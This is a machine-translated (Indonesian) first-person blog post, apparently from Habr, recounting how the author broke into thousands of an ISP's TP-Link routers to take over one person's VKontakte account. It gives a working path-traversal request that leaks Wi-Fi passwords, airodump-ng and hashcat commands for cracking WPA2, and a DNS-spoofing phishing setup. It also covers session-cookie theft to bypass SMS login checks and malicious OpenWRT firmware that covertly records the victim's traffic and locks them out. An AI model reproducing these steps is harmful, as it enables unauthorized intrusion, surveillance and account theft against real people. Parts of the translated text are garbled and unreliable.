Kerentanan apa yang bisa ditimbulkan oleh router TP-LINK

Faktanya, artikel ini tidak hanya membahas kerentanan pada router TP-LINK, tetapi juga bagaimana membuat stasiun hack dari jarak jauh dari router tersebut dan apa yang dapat dicapai dengan ini. Dan juga sedikit tentang bagaimana itu diterapkan untuk mendapatkan akses ke halaman VKontakte. Ini adalah semacam kisah tentang satu peretasan besar, yang mencakup semua hal di atas.

Saya butuh satu kali untuk mendapatkan akses ke halaman VK dari satu orang, sementara senyata mungkin bagi pengguna, dan saya mulai mencari cara. Hal pertama yang terpikir oleh saya adalah untuk menjatuhkan trojan kepada korban, karena saya sudah menyiapkan TightVNC tersembunyi dengan backconnect untuk pemutar VLC IP + tersembunyi saya, yang mentransmisikan suara dari mikrofon secara real time ke IP saya juga. Namun, itu tidak didefinisikan sama sekali sebagai malware di VirusTotal. Tetapi artikel itu bukan tentang itu sama sekali. Akibatnya, saya berhasil mendapatkan trojan, serta mendapatkan akses ke VK (hanya dengan menyalin cookie dari browser korban), tetapi segera OS diinstal ulang di komputer pengguna, dan saya harus mencari cara lain.

Satu-satunya yang saya tahu adalah penyedia yang dimiliki oleh korban. Yah, saya mulai dengan memindai seluruh jajaran penyedia terkenal kota N ini (untuk alasan yang jelas, saya tidak akan memanggil penyedia), dan saya menemukan hal yang luar biasa: port 8080 terbuka pada sebagian besar host. Segera menjadi jelas bahwa ini adalah antarmuka web router. Saya sudah berharap admin default admin (maka itu akan menjadi runtuh untuk penyedia), tetapi tidak, saya tidak dapat menemukan kata sandi, meskipun saya masih menemukan sekitar selusin router di mana kata sandi default berada. Ternyata 90% dari semua router adalah TP-Link TL-WR741ND dan lebih jarang 740N, 841N, 941ND.

gambar

Semuanya sangat jelas di sini: penyedia menyewakan router yang sama kepada pengguna, mengonfigurasinya selama instalasi, dan terlalu malas bagi pengguna untuk mengubah pengaturan ini. Itu menjadi semakin menarik. Tentunya dalam hal ini harus ada beberapa pola dalam pengaturan, yaitu, kata sandi mungkin sama. Saya memutuskan untuk google jika ada kelemahan dalam model ini dan, yang mengejutkan saya pada waktu itu, saya menemukan banyak dari mereka. Hal pertama yang menarik perhatian saya adalah artikel "Backdoor di router TP-LINK" .

Saya segera memutuskan untuk memeriksa kerentanan ini. File diunggah ke router, tetapi dia tidak menerimanya, dan kemudian saya mulai berpikir tentang apa yang dimaksud dengan nart.out ini. Ini adalah biner MIPS, yang intinya dapat berupa aplikasi apa pun, Anda hanya perlu membuatnya. Untuk memulainya, saya mulai mencari versi yang sudah jadi, karena sebelumnya, saya hampir tidak pernah harus berurusan dengan kompilasi silang. Yang mengejutkan saya, pada saat itu orang lain tertarik pada masalah ini: Specx2 (saya sarankan, omong-omong, untuk membaca artikelnyatentang cara merakit stasiun peretasan dari router, yang, pada kenyataannya, saya lakukan pada akhirnya, hanya jarak jauh). Dia berhasil menemukan netcat yang dikompilasi di bawah MIPS di salah satu forum Cina, tepatnya, di bagian di mana kerentanan ini dibahas. Biner ini berhasil diluncurkan di bawah QEMU, berhasil dituangkan ke router melalui backdoor yang ditemukan, tetapi, untuk beberapa alasan, tidak mungkin untuk terhubung ke router: itu hanya tidak memiliki koneksi. Kamerad Specx2 menyarankan bahwa intinya mungkin port 2222 mungkin ditutup, dan Anda perlu membuat netcat berjalan di port lain.

Kami mencoba mengkompilasi netcat untuk MIPS sendiri, tetapi gagal menetapkan opsi port default. Selanjutnya, kami menggunakan disassembler, tetapi tidak berhasil. Dan kemudian saya memutuskan untuk membuka biner ini dengan Notepad ++ yang biasa, dan, yang mengejutkan saya, saya menemukan 2222 yang didambakan di sana.Jumlah ini dapat dengan mudah diubah menjadi yang lain, hal utama adalah bahwa jumlah karakter dalam file tidak berubah. Port benar-benar berubah, semuanya diuji pada QEMU, tetapi kami masih belum bisa membuatnya bekerja di router.

Saya tidak meninggalkan usaha saya untuk mendapatkan kendali atas router dan mulai mencari celah lain. Segera saya menemukan posting ini . Dan memang: pada model 841 dan 941 ada shell di
/userRpmNatDebugRpm26525557/linux_cmdline.html

Hanya di sini kata sandi dari router masih perlu diketahui, dan pengguna penyedia ini pada dasarnya memiliki 741 model. Saya berhasil menemukan router dengan kata sandi default dan shell ini, walaupun sangat terpotong. Jadi, saya mendapat akses ke sistem file router. Sayangnya, saya tidak dapat menemukan sesuatu yang bernilai, dan shell tidak berfungsi dengan benar. Apakah pengembang benar-benar melakukan debugging melalui itu?

Sepertinya jalan buntu, untuk waktu yang lama saya tidak punya petunjuk sama sekali, tetapi sesuatu mengatakan kepada saya bahwa masih ada kerentanan. Dan kemudian saya menemukan bahwa router tidak memfilter permintaan GET. Yaitu, secara default, ketika kata sandi dimasukkan secara salah, halaman / help terbuka, tetapi jika, misalnya, kami membuat permintaan ini:
GET IP:port/help/../../

Kemudian kita akan sampai ke root sistem file router. Dengan demikian, kita dapat mengunduh hampir semua file dari router FS tanpa mengetahui kata sandinya. Ini ternyata merupakan kerentanan pertama yang berhasil berhasil dari semua yang saya temukan. Tapi apa manfaatnya bagi kita jika kita hanya bisa mengunduh file dan tidak tahu di mana kata sandi disimpan?

Setelah pencarian singkat, saya masih berhasil menemukan file yang menarik di /tmp/ath0.ap_bss, yang menyimpan kata sandi untuk Wi-Fi dalam bentuk yang jelas. Saya segera memutuskan untuk memeriksanya di salah satu router pengguna penyedia ini.
GET IP:8080/help/../../tmp/ath0.ap_bss

Ternyata, orang-orang bekerja di sana cukup malas, dan meletakkan kata sandi yang sama di antarmuka web router dan Wi-Fi, sehingga, setelah mempelajari kata sandi Wi-Fi dengan kerentanan ini, kami akan secara otomatis mengenali kata sandi dari antarmuka web. Ini biasanya 8 digit. Lebih jarang, angka dengan huruf. Sekali lagi, 8. Mulai sekarang, saya bisa mengakses router dari hampir semua pengguna yang tidak mengubah kata sandi yang ditetapkan oleh penyedia, dan praktis tidak ada yang mengubahnya. Benar, beberapa router masih memiliki versi firmware terbaru, dan kerentanan ini tidak berfungsi, tetapi tidak banyak dari mereka. Segera saya menemukan poin menarik lainnya. SSID dari semua poin berisi bagian kedua dari alamat IP internal pengguna, dan yang pertama adalah sama untuk semua. Ternyata sama dengan di akun pribadi di situs, kata sandinya sama.Dan bagian kedua dari IP internal ini adalah nomor kontrak. Artinya, dengan jumlah perjanjian pengguna, dimungkinkan untuk menghitung IP internal.

Terlepas dari kenyataan bahwa semua pengguna memiliki IP eksternal yang nyata (walaupun dinamis), saya memutuskan untuk meningkatkan server VPN di beberapa router ASUS, di mana ada kata sandi default. Untungnya, fitur ini dijahit ke dalam firmware default. Jadi, saya mendapat akses ke jaringan internal penyedia.

Tetapi sebelum meretas, VK masih jauh. Saya bahkan tidak tahu korban IP. Baik eksternal maupun internal. Ada banyak cara untuk mengetahui IP eksternal, dan saya melakukannya. Baiklah, mari kita mulai belajar. Pertama, dia menjawab permintaan ping, yang sudah bagus. Kedua, saya tahu bahwa korban juga memiliki router (ini juga dapat dipahami oleh TTL, karena sebagian besar pengguna memiliki Windows, dan TTL default Windows adalah 128), dengan model yang sama pasti. Tetapi, saya sangat menyesal, semua pelabuhan korban ditutup, dan tidak ada akses ke webmord dari luar. Tetapi saya tahu bahwa dalam hal apa pun itu adalah melalui LAN, tetapi untuk ini kita perlu terhubung ke router ini melalui antarmuka nirkabel, serta mengambil kata sandi untuk panel admin, yang akan sangat bermasalah, karena saya tidak dapat menemukannya pada saat itu di mana itu disimpan. Meski sekarang saya sudah tahuapa yang disimpan di/ dev / mtdblock3 , tetapi blok ini tidak di-mount, jadi tidak mungkin untuk membacanya melalui kerentanan yang dijelaskan.

Saya juga mengetahui bahwa login dari koneksi VPN untuk mengakses Internet adalah inisial dan nama keluarga pengguna atau bagian dari itu, dan kata sandinya sama. Saya mulai berpikir, bagaimana saya bisa menemukan pengguna yang saya butuhkan? Mungkin saya masih membuat kesalahan dengan mendefinisikan IP saat itu, dan sudah berhasil berubah ketika saya mencoba terhubung ke webmord? Hal pertama yang terlintas dalam pikiran adalah penghitungan sederhana semua router. Tetapi jumlah pelanggan di provider cukup besar. Setelah memindai seluruh jajaran, saya menemukan sekitar 3.000 router dengan akses jarak jauh ke antarmuka web. Dan itu perlu entah bagaimana menemukan di antara mereka yang benar, jika ada.

Pada awalnya saya mencoba menulis skrip yang akan mengenali kata sandi menggunakan kerentanan yang ditemukan, dan kemudian saya akan mengunduh halaman pengaturan jaringan dan menyimpannya. Tapi saya lemah dalam hal ini, dan, setelah membuang ide ini setelah beberapa saat, saya memutuskan untuk menggunakan clicker biasa. Dengan kesedihan menjadi dua, saya (atau lebih tepatnya, clicker) memproses seluruh rentang. Selanjutnya, saya mencari file pengaturan (berharap menemukan korban dengan nama belakang di login dari koneksi vpn), tetapi saya tidak menemukan apa pun yang saya butuhkan.

Saya mulai menggali lebih jauh dan menemukan bahwa router yang diretas dapat memindai titik akses yang mengelilinginya melalui antarmuka berbasis web. Jadi, saya punya ide gila: untuk menjebol tetangga korban dengan kerentanan ini, sehingga dengan router-nya saya bisa mencoba untuk memecahkan kata sandi Wi-Fi korban dan memasuki antarmuka web melalui LAN, selama saya melakukan perjalanan beberapa ribu kilometer tanpa kepercayaan pada kesuksesan itu tidak masuk akal, dan tidak ada kemungkinan. Tetapi untuk menerapkan apa yang dikandung pada saat itu tampaknya tidak terpikirkan. Bagaimana cara menemukan tetangga?

Ingat bahwa bagian kedua dari IP internal terkandung dalam SSID. Itu bertepatan dengan nomor kontrak. Akan menyenangkan untuk mengetahui SSID dari titik akses pengguna sehingga Anda dapat menemukannya. Apa yang telah kulakukan? Ya, saya hanya mengambilnya dan menulis ke dukungan teknis dari penyedia, memperkenalkan diri saya sebagai pengguna, seharusnya saya ingin membayar untuk Internet, tetapi saya lupa nomor kontrak. Dan saya langsung menerima jawaban, karena saya tahu nama dan alamatnya. Jadi, saya mengenali IP internal korban, yang omong-omong bersifat statis (sehingga tidak masuk akal untuk terus-menerus menghitung eksternal dinamis, karena ada akses ke jaringan internal melalui VPN di salah satu router yang diretas). Saya juga mendapatkan perkiraan SSID dari pengguna ini, jadi saya sudah memiliki sesuatu untuk dikerjakan.

Tugasnya adalah untuk masuk ke semua router berturut-turut dan salah satunya untuk menemukan router dengan SSID yang didambakan di distrik. Tugas itu sekali lagi bukan pekerjaan yang mudah, tetapi ingat bahwa kami memiliki akses ke akun pribadi Anda, di mana alamat tempat tinggal pengguna ditunjukkan. Setelah melakukan beberapa percobaan, saya menyadari bahwa ada pola tertentu antara IP internal dan alamat pengguna. Artinya, tidak perlu bahwa tetangga akan berada di subnet yang sama, tetapi setidaknya di yang tetangga, misalnya: 10.168.155.0 dan 10.168.158.0. Jadi, menemukan pengguna yang tinggal di dekat korban dengan metode pencarian ilmiah, saya mulai memilah-milah semua router di subnet tetangga. Akibatnya, saya tidak menemukan SSID yang didambakan, tetapi saya menemukan 2 tetangga setelah melihat alamat mereka di akun saya. Kepalaku meledak: bagaimana mungkin, saya menemukan tetangga, tetapi saya tidak memiliki jalur akses yang tepat di dekatnya. Namun dia, hanya dengan SSID yang diubah,dan saya menebak yang mana. Ternyata itu mudah.

Baik! Router itu ditemukan, seperti tetangganya, setelah menghabiskan banyak waktu untuk hal ini. Apa selanjutnya? Kita perlu entah bagaimana mendapatkan kata sandi dari jaringan nirkabel, tetapi untuk ini kita perlu mencegat jabat tangan dan mengambil kata sandi darinya (proteksinya adalah WPA2-PSK), atau mengambil PIN WPS, karena WPS diaktifkan secara default, tetapi pada sebagian besar router diblokir setelah 10 upaya yang tidak valid. Bagaimana kita menerapkan setidaknya sebagian dari ini? Memang, pada router tetangga tidak ada perangkat lunak khusus. Dan kemudian muncul pemikiran untuk merombak router OpenWRT mereka, karena firmware ini paling dekat dengan Linux sebenarnya, dan ada juga paket aircrack-ng, reaver dan banyak lainnya. Kamerad Specx2bahkan Bully berkumpul di bawahnya. Hanya ada satu masalah: bagaimana reflash router dari jarak jauh dan tidak kehilangan akses ke sana? Setelah semua, setelah flashing, semua pengaturan diatur ulang ke default.

Saya tersiksa dengan masalah ini untuk waktu yang lama, saya berpikir bahwa perlu untuk mengumpulkan semua firmware dari awal dan entah bagaimana melakukan pre-drive pengaturan di sana, tetapi semuanya ternyata jauh lebih sederhana. Saya bahkan tidak tahu tentang keberadaan OpenWRT Image Builder. Saya mengetahuinya dengan cukup cepat, tetapi saya harus memilih paket yang tepat, karena volume firmware tidak dapat melebihi 4MB, dan ini kecil, mengingat fakta bahwa banyak yang menyeret daftar besar dependensi. Masalah berikutnya adalah bahwa pengguna mendapat akses ke Internet hanya setelah membuat koneksi VPN dengan server penyedia, tetapi kemudian semua lalu lintas masuk ke terowongan, dan saya kehilangan kontak dengan router. Jadi, semoga tetangga saya memaafkan saya, saya meninggalkannya tanpa internet. Setelah berhasil mem-flash router-nya (setelah meninggalkan beberapa lusin pengguna tanpa Internet dalam percobaan yang gagal), saya segera mentransfer kartu jaringan router ke mode monitor
ifconfig wlan0 down
iw reg set BO
iwconfig wlan0 txpower 27
airmon-ng start wlan0

Dan meluncurkan airodump-ng .
airodump-ng mon0 โ€“c _ โ€“bssid MAC__ โ€“w /tmp/123

Menangkap jabat tangan tidak sulit. Saya segera mengunduh dump dari router menggunakan SCP
scp โ€“P port user@host:/tmp/123-01.cap ~/123.cap

Memfilternya dari paket yang tidak perlu di Wireshark:
wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol

Dan dikonversi ke format .hccap untuk Hashcat. Saya menyiapkan kamus kecil sebelumnya, yang membantu saya memecahkan banyak jaringan nirkabel, dan saya juga menambahkan semua kata sandi yang mungkin dapat digunakan oleh pengguna ini.
oclHashcat64.exe โ€“m2500 โ€“a0 123.hccap wordlist.txt

Untungnya, setelah beberapa detik kata sandi ditemukan! Tetapi Anda masih harus entah bagaimana terhubung ke router dalam mode klien! Hanya kemudian WAN untuk router tetangga berubah lagi, dan saya akan kehilangan akses ke sana. Saya masih tidak tahu bagaimana menyelesaikan masalah ini, jadi saya harus meminta seseorang untuk berkorban, masuk dari ponsel dan membuka akses jarak jauh (sekarang saya dapat berasumsi bahwa Anda hanya perlu menambahkan rute statis ke firmware terlebih dahulu). Untungnya, kata sandi dari antarmuka web ternyata admin default.

Semuanya berjalan dengan baik! Saya sudah menyiapkan rencana aksi selanjutnya. Pada IP asli saya tanpa filter, saya menaikkan server DNS, di mana saya mengubah entri untuk vk.com dan mengubahnya ke IP saya, di mana server HTTP dengan PHP juga dinaikkan. Di sana, sesuai, palsu diisi dengan halaman otorisasi vk.com, dan di router server DNS diubah menjadi milikku. Seorang pengguna masuk ke vk.com, mendapatkan kepalsuan saya, dan dengan demikian kata sandi milik saya, tujuannya tercapai!

Untuk waktu yang lama saya menggunakan metode ini untuk mendapatkan kata sandi, tetapi begitu konfirmasi login kebanggaan pada vk.com dihidupkan, yang, menurut pencipta sendiri, hampir tidak mungkin untuk berkeliling. Intinya adalah bahwa ketika mengotorisasi dari perangkat / browser baru, jika Anda memasukkan kata sandi yang benar, Anda juga harus memasukkan kode dari SMS, yang dikirim ke nomor pemilik. Tetapi untuk kasus ini, saya telah lama menyiapkan teori yang belum diuji.

Pertama-tama, saya mencoba memahami bagaimana server menentukan bahwa input berasal dari perangkat baru. Semuanya ternyata sangat sederhana: Cookie baru ditambahkan ke browser (jika ingatanku, itu disebut remixttpid), yang ditransmisikan hanya melalui koneksi terenkripsi. Dan dengan itu, server sudah menentukan browser dari mana login diizinkan. Jika saya tidak salah, User-Agent juga harus cocok. Dengan demikian, cukup bagi kami untuk mencegat cookie ini agar berhasil login dengan kata sandi yang dikenal, tetapi agak sulit untuk melakukan ini: kita perlu melewati lalu lintas pengguna melalui mitmproxy, sehingga cookie juga masuk pada saat itu. Selain itu, pengguna akan melihat peringatan peramban tentang ketidaksesuaian sertifikat. Mengapa sesat itu, pikirkuapakah Anda bisa mencegat sesi yang ada? Setelah semua, pemeriksaan browser dilakukan hanya pada saat login, tetapi tidak dilakukan untuk permintaan dari sesi yang ada! Karena itu, kita hanya perlu mencegatremixsid , yang, selain itu, ditransmisikan melalui koneksi yang tidak aman, karena pengguna tidak menggunakan https.

Masalahnya hanya remixsid itucocok dengan IP pengguna, dan jika berubah, maka cookie untuk login.vk.com juga digunakan, yang dikirimkan hanya melalui koneksi terenkripsi, dan lebih sulit untuk mencegat mereka. Tapi saya beruntung. Pada saat itu, penyedia mulai menyediakan akses ke Internet tanpa perlu membuat koneksi VPN, yang berarti saya hanya bisa menaikkan server PPTP saya dan mengatur koneksi ke sana dalam pengaturan router pengguna. Jadi saya lakukan, semua lalu lintas melewati saya, dan pengguna, tanpa menyadarinya, membuat sesi yang melekat pada IP saya, yang dicegat tanpa masalah. Selanjutnya, saya baru saja mengembalikan pengaturan sebelumnya dan menggunakan sesi yang dicegat (manfaat IP statis). Perlindungan SMS berhasil dipecahkan!

Semuanya akan baik-baik saja, tetapi saya tidak berhenti di situ. Faktanya adalah jika pengguna tiba-tiba mengerti apa yang terjadi, ia hanya dapat mengubah kata sandi dari pengaturan router dan dari Wi-Fi. Untuk mencegah hal ini, saya mulai membangun OpenWRT di bawah router pengguna. Itu perlu untuk meramalkan segalanya. Untuk memudahkan pemantauan lalu lintas korban, saya memasang server FTP sebagai sistem file menggunakan curlftpfs. Dump ditulis di sana. Seluruh proses ini dijelaskan dalam artikel ini . Awalnya, saya berencana untuk me-mount cloud sebagai sistem file, yang saya gunakan davfs2 , yang juga tidak mudah dibangun di bawah OpenWRT, tetapi masalahnya adalah bahwa file pertama kali ditulis ke cache, dan baru kemudian dituangkan ke cloud. Akibatnya, ukuran file dibatasi oleh ukuran cache, yang sangat kecil. Jadi saya memilih curlftpfs. Lalu lintas direkam menggunakan tcpdump dan dipecah menjadi file 512MB.
tcpdump -i br-lan -w /root/ftp/dump/`date +"%d_%m_%Y_%T_"` -C 512Mb &

Di mana / root / ftp / dump adalah sistem file ftp kami. Semua bisnis ini dapat dimasukkan ke dalam autostart (/etc/rc.local).
Secara umum, set terakhir paket untuk firmware OpenWRT Attitude Adjustment 12.09 tampak seperti ini:
make image PROFILE=TLWR740 PACKAGES="curlftpfs tcpdump tinyproxy wireless-tools -ppp -ppp-mod-pppoe" FILES=files/

Curlftpfs menghabiskan sebagian besar memori, tetapi memberi kami jumlah yang tidak terbatas per ftp. Tcpdump memungkinkan Anda untuk merekam lalu lintas korban sepanjang waktu, dan tinyproxy memungkinkan Anda untuk mengakses Internet dari IP korban, yaitu, dengan mencegat remixsid, misalnya, kita juga dapat memasukkan VK pengguna dari IP-nya menggunakan tinyproxy, atau kita dapat dengan mudah mengarahkan lalu lintasnya ke miliknya. proxy dengan cara ini:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to ip:port

Secara umum, kita dapat sepenuhnya mengarahkan lalu lintas. Anda juga dapat menginstal paket pada sistem file ftp yang terpasang, untuk ini kami menggunakan opkg โ€“dest , setelah menentukan nama dan alamat untuk sistem file kami di /etc/opkg.conf . Sisa konfigurasi juga harus didaftarkan sebelumnya dalam file yang sesuai.
/etc/firewall.user
/etc/config/firewall
/etc/config/network
/etc/config/system
/etc/config/wireless
/etc/rc.local
 .

Semua file ini harus disiapkan terlebih dahulu untuk menanamkannya di firmware. Sebenarnya, apa yang ini memberi kita selain fitur tambahan? Tetapi kenyataannya adalah bahwa sistem file squashfs bersifat read-only. Dengan demikian, pengguna tidak akan dapat mengubah pengaturan default yang saya atur dengan cara apa pun. Dengan seluruh kemauannya, bahkan melalui telnet, ia tidak akan dapat terhubung, karena di rc.local , yang dijahit ke dalam firmware, ada garis
echo โ€“e โ€œpass\npassโ€ | passwd root

Artinya, akses melalui telnet terpotong segera setelah router dimuat, dan hanya saya yang memiliki kata sandi SSH. Menyetel ulang ke default dengan tombol fisik juga akan gagal di sini, karena defaultnya diatur oleh saya dan dijahit ke dalam firmware. Tujuan tercapai.

Sehubungan dengan transfer semua pengguna ke IPoE dalam beberapa waktu terakhir dan ditinggalkannya VPN, semuanya berada di belakang NAT, termasuk router tempat saya memiliki VPN untuk akses ke jaringan internal penyedia. Selain mereka yang telah mengaktifkan layanan "IP Statis", tentu saja. Tetapi ada masalah: mereka yang menginginkan IP asli masih harus menggunakan VPN untuk mengakses Internet. Saya harus menyiksa diri sendiri dan membangun OpenWRT dengan klien PPTP berkabel dan terkonfigurasi (dan itu bekerja untuk beberapa alasan benar-benar miring), serta server OpenVPN berkabel dan dikonfigurasi. Banyak router mati selama percobaan, tetapi hasilnya akhirnya tercapai. Setelah menuangkan firmware tersebut ke beberapa router (dari beberapa yang tersisa dengan IP asli), saya memiliki akses yang stabil ke jaringan internal menggunakan OpenVPN.

Masalah dengan menghubungkan PPTP VPN adalah bahwa server penyedia tidak mendukung enkripsi. Ini diperbaiki dengan menambahkan baris ke /etc/ppp/options.pptp .
nomppe

Jika tidak, proses pengaturan klien PPTP VPN dan server OpenVPN tidak berbeda dengan manual OpenWRT.

Saya harap artikel ini akan menarik bagi seseorang, dan seseorang akan belajar sesuatu yang baru darinya.

UPD: Seperti yang ditulis ValdikSS dalam komentar , alih-alih curlftpfs + tinyproxy, Anda dapat menggunakan OpenSSH, yang lebih fungsional.

Source: https://habr.com/ru/post/id381573/


All Articles